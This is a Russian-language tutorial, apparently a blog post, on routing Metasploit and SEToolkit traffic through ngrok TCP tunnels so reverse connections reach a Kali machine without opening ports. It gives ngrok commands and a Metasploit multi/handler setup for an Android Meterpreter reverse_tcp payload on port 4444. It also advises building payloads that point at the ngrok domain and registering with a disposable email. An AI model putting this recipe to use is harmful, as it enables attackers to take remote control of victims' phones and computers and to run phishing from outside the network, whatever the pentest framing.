Как использовать Metasploit, SEToolkit без открытия портов Kali Linux

Как использовать Metasploit, SEToolkit без открытия портов Kali Linux

Security

Большинство сталкивается с проблемой открытие портов для тех или иных нужд, в данной статье будет показан метод как провести пентест без открытия портов. Используйте инструменты для взлома, не открывая порты: Это может быть довольно раздражающим, когда у вас ограниченный доступ к портам в сети, это может вызвать проблемы при проведении пентеста, поскольку вы можете тестировать трафик только в пределах одной сети. Если, конечно, вы не смогли бы открыть правильные порты из панели администрирования маршрутизатора по умолчанию по какой-либо причине иногда доступ к панелям администрирования запрещен, например, если вы используете мобильную точку доступа, другой пример корпоративные сети скрывают свои панели и некоторые домашние маршрутизаторы, которые воспроизводятся, даже когда тестировщик имеет доступ к открытию панели администрирования. Если у них просто не было времени на принудительный вход в систему, большинство беспроводных маршрутизаторов позволяют открывать порты только администратору! В статье будет показано как маршрутизировать ваши соединения через внешний защищенный туннель это позволит нам использовать различные инструменты для проведения пентеста, такие как Metasploit и SEToolkit, за пределами нашей сети.

  • Прежде всего, создайте одноразовый адрес электронной почты, используя getnada.com или аналогичный одноразовый сервис электронной почты. getnada
  • Загрузите ngrok в свой браузер, перейдите по ngrok.com и выберите загрузку, соответствующую архитектуре вашего процессора. Ngrok - это веб-сайт, который бесплатно предоставляет безопасные TCP-туннели. После завершения загрузки извлеките Zip-архив, а затем вставьте в него компакт-диск, например “cd ngrok”
  • Установите свой токен аутентификации (ниже приведен пример кода аутентификации, копирующий токен аутентификации из ngrok.com учетная запись. Скопируйте код аутентификации из вашей учетной записи в ngrok.com мы будем использовать это для аутентификации нашего туннеля. Вы можете сделать это, перейдя в папку, в которой хранится ngrok, и используя .”/ngrok authtoken yourauthtokenhere ” Затем код аутентификации будет сохранен.
    Пример authToken./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
Снимок экрана показывает код авторизации Ngrok
  • Чтобы создать свой первый безопасный туннель, используйте приведенную ниже команду для настройки туннеля на порту 80. Был использован HTTP-порт 80 для УСТАНОВКИ используйте любой порт, через который вы хотите, чтобы ngrok туннелировал../ngrok http 80
Снимок экрана показывает, что ngrok успешно запускает туннелирование на HTTP-порту 80. доменные имена на скриншоте являются внешними доменами вашего туннеля.
  • Откройте веб-интерфейс по адресу http://localhost:4040 проверять и воспроизводить запросы в веб-браузере по вашему выбору.
Перед запуском Metasploit сначала вам нужно будет запустить Ngrok, используя команды TCP, поскольку Metasploit будет использовать обратное TCP-соединение. Откройте новый терминал и запустите Metasploit, используя приведенную ниже команду../ngrok tcp 4444

sudo -s #Команда для получения рут-прав

msfconsole # запуск Metasploit
  • Используйте свой localhost для установки srvhost и lhost.
set lhost 0.0.0.0
set lport 4444
set uripath /
  • Используйте порт, который вы использовали для настройки ngrok, как srvport это поможет нам с туннелированием сеанса Metasploit или SEToolkit через Интернет.
  • В статьте будет настроен обработчик, используя приведенные выше настройки для Ngrok. Многие, читающие это руководство, могут использовать совершенно разные эксплойты, чтобы избежать путаницы, тут будет показано вам, как настроить обратный прослушиватель метапретера TCP. Это поможет позже при настройке туннелей с помощью других инструментов проведения пентеста, использующих обратные соединения.
msfconsole
 msf  > use multi/handler
 msf exploit(handler) > set payload android/meterpreter/reverse_tcp
 msf exploit(handler) > set LHOST 0.0.0.0
 msf exploit(handler) > set srvhost 0.0.0.0
 msf exploit(handler) > set srvport 4444
 msf exploit(handler) > set uripath /
 msf exploit(handler) > exploit
  • При создании полезных нагрузок для Metasploit вам нужно будет указать свой туннель, а также порт, который вы используете для Ngrok.
  • При создании полезных нагрузок используйте домен, предоставленный Ngrok, или вы можете пинговать домен для получения IP-адреса и использовать IP-адрес из результатов, используя тот же порт для полезной нагрузки, что и ваш слушатель.
  • Пример SEToolkit
Снимок экрана ниже показывает SEToolkit, настроенный на использование внешнего хоста.
  • Это будет работать как туннель для многих других инструментов проведения пентеста. Эта статья лишь маленький пример использования ngrok , Metasploit и SEToolkit. Вы же можете использовать Ngrok и Metasploit куда шире, чем показано это в статье.
Страница загрузки для Ngrok В этом руководстве я буду использовать 32-разрядную версию NGrok, если вы используете 64-разрядный современный процессор, тогда загрузите 64-разрядную версию Ngrok.


⚡️ Канал - ссылка

📺 YouTube - ссылка

Report Page